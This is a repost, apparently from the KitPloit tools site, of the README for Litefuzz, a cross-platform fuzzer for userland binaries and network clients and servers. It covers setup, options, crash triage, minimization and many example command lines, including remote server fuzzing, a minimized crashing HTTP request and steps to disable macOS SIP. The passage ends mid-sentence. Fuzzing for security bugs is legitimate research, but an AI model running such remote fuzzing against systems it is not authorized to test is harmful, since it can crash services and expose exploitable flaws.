Normal view
- KitPloit - PenTest & Hacking Tools
- Litefuzz - A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers
Litefuzz - A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers
Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, support both CLI/GUI apps, network clients and servers in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many different targets, across platforms, while just making a few honest trade-offs.
It isn't built for speed, scalability or meant to win any prizes in academia. It applies simple techniques at various angles to yield results. For console-based file fuzzing, you should probably just use AFL. It has superior performance, instrumention capabilities (and faster non-instrumented execs), scale and can make freakin' jpegs out of thin air. For networking fuzzing, the mutiny fuzzer also works well if you have PCAPs to replay and frizzer looks promising as well. But if you want to give this one a try, it can fuzz those kinds of targets across platforms with just a single tool.
./ and give your target... a lite fuzz.
$ sudo apt install latex2rtf
$ ./litefuzz.py -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--
[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 1
iterations: 1000
mutator: random(mutators)
@ 1000/1000 (3 crashes, 127 duplicates, ~0:00:00 remaining)
[RESULTS]
> completed (1000) iterations with (3) unique crashes and 127 dups
>> check crashes/latex2rtf for more details
This is a simple local target which AFL++ is perfectly capable of handling and just quickly given as an example. Litefuzz was designed to do much more in the way of network and GUI fuzzing which you'll see once you dive in.
why
Yes, another fuzzer and one that doesn't track all that well with the current trends and conventions. Trade-offs were made to address certain requirements. These requirements being a fuzzer that works by default on multiple platforms, fuzzes both local and network targets and is very easy to use. Not trying to convince anybody of anything, but let's provide some context. Some targets require a lot of effort to integrate fuzzers such as AFL into the build chain. This is not a problem as this fuzzer does not require instrumentation, sacraficing the precise coverage gained by instrumentation for ease and portability. AFL also doesn't support network fuzzing out of the box, and while there are projects based on it that do, they are far from straightforward to use and usually require more code modifications and harnesses to work (similar story with Libfuzzer). It doesn't do parallel fuzzing, nor support anything like the blazing speed improvments that persistent mode can provide, so it cannot scale anywhere close to what fuzzers with such capabilities. Again, this is not a state-of-the-art fuzzer. But it doesn't require source code, properly up a build or certain OS features. It can even fuzz some network client GUIs and interactive apps. It lives off the land in a lot of ways and many of the features such as mutators and minimization were just written from scratch.
It was designed to "just work" and effort has been put into automating the setup and installation for the few dependencies it needs. This fuzzer was written to serve a purpose, to provide value in a lot of different target scenarios and environments and most importantly and for what all fuzzers should ultimately be judged on: the ability to find bugs. And it does find bugs. It doesn't presume there is target source code, so it can cover closed source software fairly well. It can run as part of automation with little modification, but is geared towards being fun to use for vulnerability researchers. It is however more helpful to think of it as a R&D project rather than a fully-fledged product. Also, there's no complicated setup w here it's slightly broken out of the box or needs more work to get it running on modern operating systems. It's been tested working on Ubuntu Linux 20.04, Mac OS 11 and Windows 10 and comes with fully functional scripts that do just about everything for you in order to setup a ready-to-fuzz environment.
Once the setup script completes, it only takes a few minutes to get started fuzzing a ton of different targets.
how it works
Litefuzz supports three different modes: local, client and server. Local means targeting local binaries, which on Linux/Mac are launched via subprocess with automatic GDB and LLDB triage support respectively on crashes and via WinAppDbg on Windows. Crashes are written to a local crash directory and sorted by fault type, such as read/write AVs or SIGABRT/SIGSEGV along with the file hashes. All unique crashes are triaged as it fuzzes and this data along with target output (as available) is also captured and placed as artifacts in the same directory. It's also possible to replay crashes with --replay
and providing the crashing file. In local
client mode, the input directory should contain a server greeting, response or otherwise data that a client would expect when connecting to a server. As of now only one "shot" is implementated for network fuz zing with no complex session support. The client is launched via command line and debugged the same as when file fuzzing. A listener is setup to support this scenario, yes its a slow and borderline manual labor but it works. If a crash is detected, it is replayed in gdb to get the triage details. In remote
client mode, this works the same expect for no local debugging / crash triage. In local server mode, it's similar to local client mode and for remote
server mode it just connects to a specified target and send mutated sample client data that the user specifies as inputs, but only a simple "can we still connect, if not then it probably crashed on the last one" triage is provided.
There are a few mutation functions written from scratch which mostly do random mutations with a random selection of inputs specified by the -i
flag. For file fuzzing, just select local mode and pass it the target command line with FUZZ denoting where the app expects the filename to parse, eg. tcpdump -r FUZZ
along with an input directory of "good files" to mutate. For network client fuzzing, it's similar to local fuzzing, but also provide connection specifics via -a
. And if you want to fuzz servers, do server mode and provide a protocol://address:port
just like for clients.
It fuzzes as fast as the target can consume the data and exit, such as the case for most CLI applications or for as long as you've determined it needs before the local execution or network connection times out, which can be much slower. No fancy exec or kernel tricks here. But of course if you write a harness that parses input and exits quickly, covering a specific part of the target, that helps too. But at that point, if you can get that close to the target, you're probably better off using persistant mode or similar features that other fuzzers can offer.
In short...
what it does
- runs on linux, windows and mac and supports py2/py3
- fuzzes CLI/GUI binaries that read from files/stdin
- fuzzes network clients and servers, open source or proprietary, available to debug locally or remote
- diffs, minimization, replay, sorting and auto-triaging of crashes
- misc stuff like TLS support, golang binary fuzzing and some extras for Mac
- mutates input with various built-in mutators + pyradamsa (Linux)
what it doesn't do
- native instrumentation
- scale with concurrent jobs
- complex session fuzzing
- remote client and server monitoring (only basic checks eg. connect)
support
Primarily tested on Ubuntu Linux 20.04 (lightly tested on 21.04), Windows 10 and Mac OS 11. The fuzzer and setup scripts may work on slightly older or newer versions of these operating systems as well, but the majority of research, testing and development occurred in these environments. Python3 is supported and an effort was made to make the code compatiable with Python2 as well as it's necessary for fuzzing on Windows via WinAppDbg. Platform testing primarily occured on Intel-based hardware, but things seem to mostly work on Apple's M1 platform too (notable exceptions being on Linux the exploitable plugin for GDB probably isn't supported, nor is Pyradamsa). There are also setup scripts in setup/ to automate most or all of the tasks and depencency installation. It can generally fuzz native binaries on each platform, wh ich are often compiled in C/C++, but it also catch crashes for Golang binaries as well (experimental).
python versions
Python3 is supported for Linux and Mac while Python2 is required for Windows.
Why Py3 for Linux and Mac? Pyautogui, Pyradamsa (Linux only), better socket support on Mac.
Why Py2 for Windows? Winappdbg requires Py2.
linux
GDB for debugging and exploitable for crash triage. If it's OSS, you can build and instrument the target with sanitizers and such, otherwise there's some memory debuggers we can just load at runtime.
This installation along with the python dependencies and other helpful stuff has been automated with setup/linux.sh. Recommended OS is Ubuntu 20.04 as that is where the majority of testing occurred.
mac
Instead of gdb, we use lldb for debugging on OS X as it's included with the XCode command line tools. Being an admin or in the developer group should let you use lldb, but this behavior may differ across environments and versions and you may need to run it with sudo privileges if all else fails.
The one thing you'll manually need to do is turn off SIP (in recovery, via cmd+R or use vmware fusion hacks). Otherwise, auto-triage will fail when fuzzing on Tim Apple's OS.
Almost all of the setup has been automated with the setup/mac.sh script, so you can just run it for a quick start.
windows
WinAppDbg is used for debugging on Windows with the slight caveat that stdin fuzzing isn't supported.
Like the automated setups for the other operating systems, chocolatey helps to automate package installation on windows. Run setup/windows.bat in the litefuzz root directory as Administrator to automate the installations. It will install debugging tools and other dependencies to make things run smoothly.
targets
This is a list of the types of targets that have been tested and are generally supported.
-
Local CLI/GUI apps that parse file formats or stdin
- debug support
-
Local CLI/GUI network client that parses server responses
- debug support for CLIs
- limited debug support for GUIs
-
Local CLI network server that parses client requests
- debug support (caveat: must able to run as a standalone executable, otherwise can be treated as remote)
-
Local GUI network server that parses client requests
- theoretically supported, untested
-
Remote CLI/GUI network client that parses server responses
- no debug support
-
Remote CLI/GUI network server that parses client requests
- no debug support
- exception being on Mac and using
attach
orreportcrash
features
Again, the fuzzer can run on and support local apps, clients and servers on Linux, Mac and Windows and of course can fuzz remote stuff independent of the target platform.
triage
-
Local CLI/GUI apps that parse file formats or stdin
- run app, catch signals, repro by running it again inside a debugger with the crasher
-
Local CLI/GUI network client that parses server responses
- run app, catch signals, repro by running it again inside a debugger with the crasher
-
Local GUI/CLI network server that parses client requests
- run app in debugger, catch signals, repro by running it again inside a debugger with the crasher
-
Remote CLI/GUI network client that parses server responses
- no visiblity, collect crashes from the remote side
- can manually write supporting scripts to aid in triage
-
Remote CLI/GUI network server that parses client requests
- no visiblity, collect crashes from the remote side
- can manually write supporting scripts to aid in triage
- exception on Mac are the
attach
andreportcrash
options, which can be used to enable some triage capabilities
getting started
Most of the setup across platforms has been automated with the scripts in the setup directory. Simply run those from the litefuzz root and it should save you a lot of time and help enable some of what's needed for automated deployments. It's useful to use a VM to setup a clean OS and fuzzing environment as among other things its snapshot capabilities come in handy.
See INSTALL.md for details.
tests
unit tests
There are a few simple unit and functional tests to get some coverage for Litefuzz, but it is not meant to be complete.
py2> pytest
py3> python3 -m pytest
This will run pytest for test_litefuzz.py
in the main directory and provide PASS/FAIL results once the test run is finished.
crashing app tests
A few examples of buggy apps for testing crash and triage capabilities on the different platforms can be found in the test
folder.
- (a) null pointer dereference
- (b) divide-by-zero
- (c) heap overflow
- (d-gui) format string bug in a GUI
- (e) buffer overflow in client
- (f) buffer overflow in server
They are automatically built during setup and you can run them on the command line, in a debugger or use them to test as fuzzing targets. If running on Windows command line, check Event Viewer -> Windows Logs -> Application
to see crashes.
options
There are a ton of different options and features to take advantage of various target scenarios. The following is a brief explanation and some examples to help understand how to use them.
crash directory
-o
lets you specify a crash directory other than the default, which is the crashes/ in the local path. One can use this to manage crash folders for several concurrent fuzzing runs for different apps at the same time.
insulate mode
-u
insulates the target application from the normal fuzzing process, eg. execs or sending packets over and over and checking for crashes. Instead, this mode was made for interactive client applications, eg. Postman where you can script inside the application to repeat connections for client fuzzing. The target is ran inside of a debugger, the fuzzer is paused to get the user time to click a few buttons or sets the target's config to make it run automatically, user resumes and now you are fuzzing interactive network clients.
litefuzz -lk -c "/snap/postman/140/usr/share/Postman/_Postman" -i input/http_responses -a tcp://localhost:8080 -u -n 100000 -z
Insulate mode + refresh can be used for interactive clients, eg. run FileZilla in a debugger, but keep hitting F5 to make it reconnect to the server for each new iteration. Also, fuzzing local CLI/GUI servers are only started and ran once inside a debugger to make the process a little more efficient.
--key
also allows you to send keys while fuzzing interactive targets, such as fuzzing FileZilla's parsing of FTP server responses by sending "refresh connection" with F5.
litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp/filezilla -u -pp --key "F5" -n 100 -z glibc
note: insulate mode has only been tested working on Linux and is not supported on Windows.
timeout
-x secs
allows you to specify a timeout. In practice, this is more like "approx how long between iterations" for CLI targets and an actual timeout for GUIs.
mutators
--mutator N
specifies which mutator to use for fuzzing. If the option is not provided, a random choice from the list of available mutators is chosen for each fuzzing iteration. These mutators were written from scratch (with the exception of Radamsa of course). And while they have been extensively tested and have held up pretty well during millions of iterations, they may have subtle bugs from time to time, but generally this should not affect functionality.
FLIP_MUTATOR = 1
HIGHLOW_MUTATOR = 2
INSERT_MUTATOR = 3
REMOVE_MUTATOR = 4
CARVE_MUTATOR = 5
OVERWRITE_MUTATOR = 6
RADAMSA_MUTATOR = 7
note: Radamsa mutator is only available on Linux (+ Py3).
ReportCrash
--reportcrash
is mac-specific. Instead of using the default triage system, it instructs the fuzzer to monitor the ReportCrash directory for crash logs for the target process. ReportCrash must be enabled on OS X (default enabled, but usually disabled for normal fuzzing). This feature is useful in scenarios where we can't run the target in a debugger to generate and triage our own crash logs, but we can utilize this core functionality on the operating system to gain visibility.
note: consider this feature experimental as we're relying on a few moving parts and components we don't directly control within the core MacOS system. ReportCrash may eventually stop working properly and responding after fuzzing for a while even after attempting to unload and reload it, so one can try rebooting the machine or resetting the snapshot to get it back in good shape.
sudo launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
pause
Hit ctrl+c to pause the fuzzing process. If you want to resume, choose y
or n
to stop. This feature works ok across platforms, but may be less reliable when fuzzing GUI apps.
reusing crashes for variant finding
-e
enables reuse mode. This means that if any crashes were found during the fuzzing run, they will be used as inputs for a second round of fuzzing which can help shake out even more bugs. Combine with -z
for -ez
bugs! Da-duph.
The following example is fuzzing antiword with 100000 iterations and then start another run with the same iteration count and options to reuse the crashes as input to try and grind out even more bugs.
litefuzz -l -c "antiword FUZZ" -i docs -n 100000 -ez
(or one could manually copy over crashes to an input directory to directly control the interations for the reuse run)
litefuzz -l -c "antiword FUZZ" -i docs-crashes -n 500000 -z
note: this mode is supported for local apps only.
memory debugging helpers
-z
enables Electric Fence (or glib malloc debugging as fallback) on Linux, Guard Malloc on Mac and PageHeap on Windows. Also, -zz
can be used to disable PageHeap after enabling it for an application. If you want to just flip it on/off without starting the fuzzer, just leave out the -i
flag. During Windows setup, gsudo is installed and can be used to run elevated commands on the command line, such as turning on PageHeap for targets.
sudo litefuzz -l -c "notepad FUZZ" -i texts/files -z
sudo litefuzz -l -c "notepad FUZZ" -zz
On Linux, specific helpers can be chosen. For example, instead of just using glib malloc as a fallback, it can be selected.
litefuzz -l -c "geany FUZZ" -i texts/codes -z glibc
The default Electric Fence malloc debugger is great, but it doesn't work with all targets. You can test the target with EF and if it crashes, select the glibc helper instead.
checking live target output
If fuzzing local apps on Linux or Mac, you can cat /tmp/litefuzz/RUN_ID/fuzz.out
to check what the latest stdout was from the target. RUN_ID
is shown in the STATS information area when fuzzing begins. In the event that a crash occurs, stdout is also captured in the crashes directory as the .out
file. Global stdout/stderr also goes to /tmp/litefuzz/out
for debugging purposes as well for all fuzzing targets with the exception of insulated or local server modes which debugger output goes to /tmp/litefuzz/RUN_ID/out
. Winappdbg doesn't natively support capturing stdout of targets (AFAIK), so this artifact is not available on Windows.
client and server modes
If the server can be ran locally simply by executing the binary (with or without some flags and configuration), you can pass it's command line with -c
and it will be started, fuzzed and killed with a new execution every iteration. The idea here is trading speed for the ability avoid those annoying bugs which triggered only after the target's memory is in a "certain state", which can lead to false positives. Same deal with locally fuzzing network clients. It even supports TLS connections, generating certificates for you on the fly (allowing the user to provide a client cert when fuzzing a server that requires it and certificate fuzzing itself are other ideas here). Debugging support is not provided by Litefuzz when fuzzing remote clients and servers, so setup on that remote end is up to the user. For servers, we simply check if the server stopped responding and note the previous payload as the crasher. This works fine for TCP connections, but we don't quite have this luxury for UDP services, so monitoring the remote server is left up to either the ReportCrash feature (available on Mac), running the target in a debugger (via local server mode or manually) or crafting custom supporting scripts. Also, some servers may auto-restart or otherwise recover after crashing, but there may be signs of this in the logs or other artifacts on the filesystem which can parsed by supporting scripts written for a particular target.
local network examples
litefuzz -lk -c "wget http://localhost:8080" -a tcp://localhost:8080 -i input/http -z
litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -z
litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -o crashes/curl --tls -n 100000 -z
(open Wireshark and capture the response from a d, right click Simple Network Management Protocol -> Export Packet Bytes -> resp.bin)
litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3
litefuzz -ls -c "./sc_serv shoutcast.conf" -a localhost:8000 -i input/shouts -z
litefuzz -ls -c "snmpd" -i input/snmp -a udp://localhost:161 -z
quick notes
- UDP sockets can act a little strange on Mac + Py2, so only Mac + Py3 has been tested and supported
- Local network client fuzzing on Windows can be buggy and should be considered experimental at this time
remote network examples
Fuzzing remote clients and servers is a bit more challenging: we have no local debugging and rely on catching a halt in interaction between the two parties over the network to catch crashes. Also, since we are assumedly blind to what's happening on the other end, fuzzing ends when the client or server stops responding and needs to be restarted manually after the client or server is restored to a normal (uncrashed) state unless the user has setup scripts on the remote side to manage this process. Again, UDP complicates this further. Even sending a test packet to see if there's a listening service on a UDP port doesn't guarantee a reply. So it's possible to remotely fuzz network clients and servers, but there's a trade-off on visibility.
client
while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done
litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -pp -n 100
Client mode is more finicky here because it's hard to tell whether a client has actually crashed so it's not reconnecting or if the send/recv dance is just off as different clients can handle connections however they like. Also note that this just an example and that remote client fuzzing by nature is tricky and should be considered somewhat experimental.
server
The pros and cons of fuzzing a server locally or remotely can help you make a decision of how to approach a target when both options are available. Basically, fuzzing with the server in a debugger is going to be slower but you'll be able to get crash logs with the automatic triage, whereas fuzzing the server in remote mode (even pointing it to the localhost) will be much faster on average, but you lose the high visibility, debugger-based triage capabilities but it will give you time to manually restart the server after each crash to keep going before it exits (TCP servers only, feature does not support UDP-based servers).
Shoutcast
./sc_serv ...
litefuzz -s -a localhost:8000 -i input/shouts -n 10000
SSHesame
sshesame
litefuzz -s -a tcp://target:2022 -i input/ssh-server -p -n 1000000 -x 0.05
FTP
litefuzz -s -a tcp://target:21 -i input/ftp/req.txt -pp -n 1000
DNS
coredns -dns.port 10000
litefuzz -ls -c "coredns -dns.port 10000" -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000
or
litefuzz -s -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000
TLS
litefuzz -s -a tcp://hostname:8080 -i input/http --tls -n 10000
...
@ 48/10000 (1 crashes, 0 duplicates, ~7:13:18 remaining)
[!] check target, sleeping for 60 seconds before attempting to continue fuzzing...
note: default remote server mode delays between fuzzing iterations can make fuzzing sessions run reliably, but are pretty slow; this is the safe default, but one can use -x
to set very fast timeouts between sessions (as shown above) if the target is OK parsing packets very quickly, unoffically nicknamed "2fast2furious" mode
For more on session-based protocols (such as FTP or SSH), see Multiple modes.
multiple data exchange modes
-p
is for multiple binary data mode, which allows one to supply sequential inputs, eg. input/ssh directory containing files named "1", "2", "3", etc for each packet in the session to fuzz. This is meant to enable fuzzing of binary-based protocol implementations, such as SSH client.
ls input/ssh
1 2 3 4
xxd input/ssh/2 | head
00000000: 0000 041c 0a14 56ff 1297 dcf4 672d d5c9 ......V.....g-..
00000010: d0ab a781 dfcb 0000 00e6 6375 7276 6532 ..........curve2
00000020: 3535 3139 2d73 6861 3235 362c 6375 7276 5519-sha256,curv
00000030: 6532 3535 3139 2d73 6861 3235 3640 6c69 e25519-sha256@li
00000040: 6273 7368 2e6f 7267 2c65 6364 682d 7368 bssh.org,ecdh-sh
00000050: 6132 2d6e 6973 7470 3235 362c 6563 6468 a2-nistp256,ecdh
00000060: 2d73 6861 322d 6e69 7374 7033 3834 2c65 -sha2-nistp384,e
00000070: 6364 682d 7368 6132 2d6e 6973 7470 3532 cdh-sha2-nistp52
00000080: 312c 6469 6666 6965 2d68 656c 6c6d 616e 1,diffie-hellman
00000090: 2d67 726f 7570 2d65 7863 6861 6e67 652d -group-exchange-
Each packet is consumed into an array, a random index is mutated and replayed to fuzz the target.
litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh -o crashes/ssh -p -n 250000 -z glibc
And you can check on the target's output for the latest iteration.
cat /tmp/litefuzz/out
kex_input_kexinit: discard proposal: string is too large
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: string is too large
... and others like
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: unknown or unsupported key type
ssh_askpass: exec(/usr/bin/ssh-askpass): No such file or directory
Host key verification failed.
Bad packet length 1869636974.
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect
-pp
asks the fuzzer to check inputs for line breaks and if detected, treat those as multiple requests / responses. This is useful for simple network protocol fuzzing for mostly string-based protocol implementations, eg. ftp clients.
cat input/ftp/test
220 ProFTPD Server (Debian) [::ffff:localhost]
331 Password required for user
230 User user logged in
215 UNIX Type: L8
221 Goodbye
The fuzzer breaks each line into it's own FTP response to try and fuzz a client's handling of a session. There's no guarentee, however, that a client will "behave" or act in ways that don't allow a session to complete properly, so some trial and error + fine tuning for session test cases while running Wireshark can be helpful for understanding the differences in interaction between targets.
litefuzz -lk -c "ftp localhost 2121" -a tcp://localhost:2121 -i input/ftp -o crashes/ftp -n 100000 -pp -z
This can also be combined with -u for insulating GUI network targets like FileZilla.
litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp.resp -n 100000 -u -pp -z glibc
attaching to a process
If the target spawns a new process on connection, one can specify the name of a process (or pid) to attach to after a connection has been established to the server. This is handy in cases where eg. launchd is listening on a port and only launches the handling process once a client is connected. This is one feature that sort of blurs the line between local and remote fuzzing, as technically the fuzzer is in remote mode, yet we specify the target address as localhost and ask it to attach to a process.
./litefuzz.py -s -a tcp://localhost:8080 -i input/shareserv -p --attach ShareServ -x 1 -n 100000
note: currently this feature is only supported on Mac (LLDB) and for network fuzzing, although if implemented it should work fine for Linux (GDB) too.
crash artifacts
When a crash is encountered during fuzzing, it is replayed in a debugger to produce debug artifacts and bucketing information. The information varies from platform to platform, but generally the a text file is produced with a backtrace, register information, !exploitable
type stuff (where available) and other basic information.
Memory dumps can be enabled on Windows by passing the --memdump
or disabled with --nomemdump
similar to how malloc debuggers are controlled via -z
and -zz
respectively. If enabled, the dump will also be loaded in the console debugger (cdbg) and !analyze -v
crash analysis output is captured within an additional memory dump crash analysis log. Winappdbg already has !exploitable type analysis that we get in the initial crash analysis, so we just do !analyze here.
litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump
or to disable memory dumps for an application
litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --nomemdump
In addition to auto-crash triage, binary/string diffs (as appropriate) and target stdout (platform / target dependent) is also produced and repro files of course.
For local fuzzing, artifacts generally include diffs, stdout (linux/mac only), repro file and the crash log and information file.
$ ls crashes/latex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diff
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diffs
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.out
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.tex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.txt
On Windows, if memory dumps are enabled, a dump file will be generated and additional triage information will be written to an additional crash analysis log.
C:\litefuzz\crashes> dir
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.dmp
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.log
....
For remote fuzzing, artifacts may vary depending on the options chosen, but often include diffs, repro file and/or repro file directory (if input is a session with multiple packets), previous fuzzing iteration repro (prevent losing a bug in case its actually the crasher as remote fuzzing has its challenges) and crash log or brief information file.
ls crashes/serverd
REMOTE_SERVER_testbox.1_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_PREV_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diff
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diffs
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.txt
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.zz
ls crashes/serverd/REMOTE_SERVER_localhost_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_1.zz REMOTE_SERVER_localhost_NNNN_2.zz
REMOTE_SERVER_testbox.1_NNNN_3.zz REMOTE_SERVER_localhost_NNNN_4.zz
golang
Apparently when Golang binaries crash, they may not actually go down with a traditional SIGSEGV, even if that's what they say in the panic info (Linux tested). They may instead crash with return code 2. So I guess that's what we're going with :) I'm sure there's a better explanation out there for how this works and edge cases around it, but one can use --golang
to try and catch crashes in golang binaries on Linux.
litefuzz -l -c "evernote2md FUZZ" -i input/enex -o crashes/evernote2md --golang -n 100000
repros
Crashing files are kept in the crashes/ directory (or otherwise specified by -o flag) along with diffs and crash info.
-r
and passing a repro file (or directory) with the appropriate target command line / address setup will try and reproduce the crash locally or remote.
local example
litefuzz -l -c "latex2rtf FUZZ" -r crashes/latex2rtf/test.tex -z
local network example
./litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -r crashes/crash.raw
remote network example
litefuzz -s -a tcp://host:8000 -r crashes/crash.raw
remote network example (multiple packets)
litefuzz -s -a tcp://localhost:22 -r repro/dir/here
remove file
Some targets ask for a static outfile location as part of their command line and may throw an error if that file already exists. --rmfile is an option for getting around this while fuzzing where after each fuzzing iteration, it will remove the file that was generated as a part of how the target functions.
litefuzz -l -c "hdiutil makehybrid -o /tmp/test.iso -joliet -iso FUZZ" -i input/dmg --rmfile /tmp/test.iso -n 500000 -ez
minimization
Minimizing crashing files is an interesting activity. You can even infer how a target is parsing data by comparing a repro with a minimized version.
-m
and passing a repro file with the target command line or address setup will attempt to generate a minimized version of the repro which still crashes the target, but smaller and without bytes that may not be necessary. During this minimization journey, it may even find new crashes. Only local modes are supported, but this still includes local client and server modes, so you can minimize network crashes as long as we can debug them locally.
For example, this request is the original repro file.
GET /admin.cgi?pass=changeme&mode=debug&option=donotcrash HTTP/1.1
Host: localhost:8000
Connection: keep-alive
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
Referer: http://localhost:8000/admin.cgi?mode=debug
Now take a look at it's minimized version.
GET /admin.cgi?mode=debug&option=a
Authorization:s YWRtaW46Y2hhbmdlbWU
Referer:admin.cgi
One can make some guesses about what the target is looking for and even the root cause of the crash.
- The request is most important part
- option= can probably be a lot of different things
- The Host and Connection headers aren't neccesary
- Authorization header parsing is just looking for the second token and doesn't care if it's explicitly presenting Basic auth
- Referer is necessary, but only admin.cgi and not the host or URL
Anything else? Here's a bonus: passing a valid password isn't needed if the Authorization creds are correct, and visa-versa. Since the minimization is linear and starts at the beginning of the file and goes until it hits the end, we'd only produce a repro which authenticates this way, while still discovering there are actually two options!
-mm
enables supermin mode. This is slower, but it will try and minimize over and over again until there's no more unnecessary bytes to remove.
For fun, we can modify the repro and run it through supermin
to get the maximally minimized version.
GET /admin.cgi?pass=changeme&mode=debug&option=a
Referer:admin.cgi
minimization examples
litefuzz -l -c "latex2rtf FUZZ" -m test.tex -z
litefuzz -ls -c "./sc_serv shoutcast.conf" -a "tcp://localhost:8000" -m repro.http
supermin example
litefuzz -l -c "latex2rtf FUZZ" -mm crashes/latex2rtf/test.tex -z
...
[+] starting minimization
@ 582/582 (1 new crashes, 1145 -> 582 bytes, ~0:00:00 remaining)
[+] reduced crash @ pc=55555556c141 -> pc=55555557c57d to 582 bytes
[+] supermin activated, continuing...
@ 299/299 (1 new crashes, 582 -> 300 bytes, ~0:00:00 remaining)
[+] reduced crash @ pc=55555557c57d to 300 bytes
...
[+] reduced crash @ pc=555555562170 to 17 bytes
@ 17/17 (2 new crashes, 17 -> 17 bytes, ~0:00:00 remaining)
[+] achieved maximum minimization @ 17 bytes (test.min.tex)
[RESULTS]
completed (17) iterations with 2 new crashes found
command
--cmd
allows a user to specify a command to run after each iteration. This can be used to cleanup certain operations that would otherwise take up resources on the system.
litefuzz -l -c "/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter FUZZ" -i input/dmg --cmd "umount /Volumes/test.dir" --click -x 5 -n 100000 -ez
examples
local app
quick look
litefuzz -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -x 1 -n 100
--========================--
--======| litefuzz |======--
--========================--
[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 4
iterations: 100
mutator: random(mutators)
@ 100/100 (1 crashes, 4 duplicates, ~0:00:00 remaining)
[RESULTS]
> completed (100) iterations with (1) unique crashes and 4 dups
>> check crashes/latex2rtf dir for more details
enumerating file handlers on Ubuntu
$ cat /usr/share/applications/defaults.list
[Default Applications]
application/csv=libreoffice-calc.desktop
application/excel=libreoffice-calc.desktop
application/msexcel=libreoffice-calc.desktop
application/msword=libreoffice-writer.desktop
application/ogg=rhythmbox.desktop
application/oxps=org.gnome.Evince.desktop
application/postscript=org.gnome.Evince.desktop
....
fuzz the local tcpdump's pcap parsing (Linux)
litefuzz -l -c "tcpdump -r FUZZ" -i test-pcaps
fuzz Evice document reader (Linux GUI)
litefuzz -l -c "evince FUZZ" -i input/oxps -x 1 -n 10000
fuzz antiword (oldie but good test app :) (Linux)
litefuzz -l -c "antiword FUZZ" -i input/doc -ez
note: you can (and probably should) pass -z
to enable Electric Fence (or fallback to glibc's feature) for heap error checking
enumerating file handlers on OS X
swda can enumerate file handlers on Mac.
$ ./swda getUTIs | grep -Ev "No application set"
com.adobe.encapsulated-postscript /System/Applications/Preview.app
com.adobe.flash.video /System/Applications/QuickTime Player.app
com.adobe.pdf /System/Applications/Preview.app
com.adobe.photoshop-image /System/Applications/Preview.app
....
fuzz gpg decryption via stdin with heap error checking (Mac)
litefuzz -l -c "gpg --decrypt" -i test-gpg -o crashes-gpg -z
fuzz Books app (Mac GUI)
litefuzz -l -c "/System/Applications/Books.app/Contents/MacOS/Books FUZZ" -i test-epub -t "/Users/test/Library/Containers/com.apple.iBooksX/Data" -x 8 -n 100000 -z
note: -z
